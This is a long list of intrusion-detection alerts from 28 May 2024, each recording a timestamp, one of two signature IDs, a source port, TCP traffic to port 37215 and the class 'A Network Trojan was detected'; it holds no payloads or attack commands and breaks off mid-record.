          Timestamp:05/28/24-14:46:58.269260
          SID:2829579
          Source Port:41670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763619
          SID:2829579
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878716
          SID:2835222
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124684
          SID:2835222
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399704
          SID:2829579
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864250
          SID:2829579
          Source Port:54418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684652
          SID:2835222
          Source Port:32918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325913
          SID:2829579
          Source Port:57612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271962
          SID:2829579
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485875
          SID:2835222
          Source Port:52626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530020
          SID:2835222
          Source Port:51398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724041
          SID:2835222
          Source Port:44204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214133
          SID:2835222
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155630
          SID:2829579
          Source Port:46762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042723
          SID:2835222
          Source Port:54566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402109
          SID:2829579
          Source Port:53534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.857281
          SID:2829579
          Source Port:44546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925394
          SID:2829579
          Source Port:47422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172585
          SID:2835222
          Source Port:37460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372036
          SID:2835222
          Source Port:38260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536782
          SID:2829579
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287604
          SID:2835222
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152523
          SID:2829579
          Source Port:54734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.707839
          SID:2829579
          Source Port:44982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770270
          SID:2835222
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151770
          SID:2835222
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.316443
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.937918
          SID:2835222
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943486
          SID:2835222
          Source Port:52788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075040
          SID:2835222
          Source Port:36812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988624
          SID:2829579
          Source Port:37230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818451
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992128
          SID:2835222
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710543
          SID:2835222
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297641
          SID:2829579
          Source Port:46196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925471
          SID:2829579
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299242
          SID:2829579
          Source Port:60096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548613
          SID:2829579
          Source Port:51692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.792521
          SID:2835222
          Source Port:57394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849184
          SID:2835222
          Source Port:59936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867524
          SID:2829579
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328014
          SID:2835222
          Source Port:41542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146204
          SID:2835222
          Source Port:58480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.550101
          SID:2835222
          Source Port:37064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102739
          SID:2835222
          Source Port:56050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527435
          SID:2829579
          Source Port:34092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273501
          SID:2829579
          Source Port:49476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299546
          SID:2835222
          Source Port:51984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206388
          SID:2835222
          Source Port:34140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588927
          SID:2829579
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039081
          SID:2829579
          Source Port:37976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154051
          SID:2829579
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817974
          SID:2829579
          Source Port:58764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709041
          SID:2829579
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708965
          SID:2835222
          Source Port:53994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125274
          SID:2835222
          Source Port:34798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283930
          SID:2829579
          Source Port:48514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208313
          SID:2829579
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711181
          SID:2829579
          Source Port:51210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764351
          SID:2835222
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338705
          SID:2829579
          Source Port:42350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102313
          SID:2835222
          Source Port:34260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341014
          SID:2835222
          Source Port:54794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668889
          SID:2835222
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339649
          SID:2835222
          Source Port:58652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809849
          SID:2835222
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247562
          SID:2835222
          Source Port:33724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689770
          SID:2829579
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350450
          SID:2835222
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976330
          SID:2829579
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941393
          SID:2829579
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.107133
          SID:2829579
          Source Port:50002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177072
          SID:2829579
          Source Port:50262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.151921
          SID:2829579
          Source Port:35514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338485
          SID:2829579
          Source Port:59786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142024
          SID:2829579
          Source Port:36176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402973
          SID:2829579
          Source Port:34420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201799
          SID:2829579
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241901
          SID:2835222
          Source Port:53646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877694
          SID:2835222
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105638
          SID:2835222
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230371
          SID:2829579
          Source Port:49986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177174
          SID:2829579
          Source Port:35668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728739
          SID:2835222
          Source Port:36322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338265
          SID:2829579
          Source Port:42164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338106
          SID:2835222
          Source Port:56490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529075
          SID:2835222
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020329
          SID:2829579
          Source Port:45824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808224
          SID:2835222
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116704
          SID:2835222
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838428
          SID:2835222
          Source Port:39296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841170
          SID:2829579
          Source Port:34102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678549
          SID:2829579
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680354
          SID:2835222
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722338
          SID:2829579
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366114
          SID:2835222
          Source Port:37334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111338
          SID:2829579
          Source Port:51340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.429323
          SID:2829579
          Source Port:48212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.768651
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977368
          SID:2835222
          Source Port:55772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511647
          SID:2829579
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772166
          SID:2835222
          Source Port:57682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299220
          SID:2835222
          Source Port:47960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480453
          SID:2835222
          Source Port:32958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562899
          SID:2829579
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156246
          SID:2835222
          Source Port:32884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208036
          SID:2829579
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299219
          SID:2835222
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847690
          SID:2829579
          Source Port:35316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341142
          SID:2829579
          Source Port:45322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221532
          SID:2835222
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324050
          SID:2835222
          Source Port:37740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848152
          SID:2835222
          Source Port:60436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087311
          SID:2835222
          Source Port:34758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202006
          SID:2835222
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221247
          SID:2835222
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821791
          SID:2829579
          Source Port:57068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144051
          SID:2829579
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742354
          SID:2835222
          Source Port:36430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224152
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839699
          SID:2835222
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807634
          SID:2829579
          Source Port:37218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033281
          SID:2835222
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187368
          SID:2829579
          Source Port:54876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562807
          SID:2835222
          Source Port:51496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.214128
          SID:2829579
          Source Port:37340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402166
          SID:2829579
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466331
          SID:2829579
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728683
          SID:2829579
          Source Port:46538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472699
          SID:2835222
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946898
          SID:2835222
          Source Port:59150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081372
          SID:2835222
          Source Port:50504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650041
          SID:2835222
          Source Port:48346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153381
          SID:2835222
          Source Port:33846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609550
          SID:2835222
          Source Port:52240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123692
          SID:2835222
          Source Port:39484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431570
          SID:2835222
          Source Port:53714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299709
          SID:2829579
          Source Port:37472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436234
          SID:2835222
          Source Port:59670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.279672
          SID:2835222
          Source Port:37982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305493
          SID:2835222
          Source Port:34936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301313
          SID:2835222
          Source Port:43038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322849
          SID:2829579
          Source Port:59936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511364
          SID:2829579
          Source Port:59948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543257
          SID:2829579
          Source Port:36264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846968
          SID:2835222
          Source Port:40786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304292
          SID:2835222
          Source Port:34318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.559761
          SID:2835222
          Source Port:52656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216385
          SID:2835222
          Source Port:51276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196570
          SID:2835222
          Source Port:38768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.869112
          SID:2835222
          Source Port:51020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115378
          SID:2829579
          Source Port:57362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223289
          SID:2835222
          Source Port:33190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175980
          SID:2829579
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542052
          SID:2829579
          Source Port:55334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123777
          SID:2835222
          Source Port:33090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301327
          SID:2835222
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213275
          SID:2829579
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741772
          SID:2835222
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175990
          SID:2835222
          Source Port:51366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.411925
          SID:2829579
          Source Port:54206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437481
          SID:2835222
          Source Port:58456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216400
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680368
          SID:2835222
          Source Port:55454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144043
          SID:2835222
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624914
          SID:2829579
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685508
          SID:2835222
          Source Port:55946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656268
          SID:2829579
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297516
          SID:2835222
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547262
          SID:2835222
          Source Port:49258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923706
          SID:2829579
          Source Port:42230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124506
          SID:2835222
          Source Port:40848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241191
          SID:2829579
          Source Port:56522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400649
          SID:2829579
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402255
          SID:2829579
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051195
          SID:2829579
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196854
          SID:2835222
          Source Port:36994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804578
          SID:2835222
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113258
          SID:2829579
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.318838
          SID:2829579
          Source Port:56300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530374
          SID:2835222
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598925
          SID:2835222
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473459
          SID:2829579
          Source Port:58668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472312
          SID:2829579
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793263
          SID:2829579
          Source Port:47998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663429
          SID:2835222
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497566
          SID:2829579
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874078
          SID:2829579
          Source Port:54198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593119
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838696
          SID:2829579
          Source Port:48494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627821
          SID:2829579
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781074
          SID:2835222
          Source Port:36836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276967
          SID:2835222
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770302
          SID:2829579
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890945
          SID:2829579
          Source Port:58306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147286
          SID:2829579
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209408
          SID:2829579
          Source Port:52026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497879
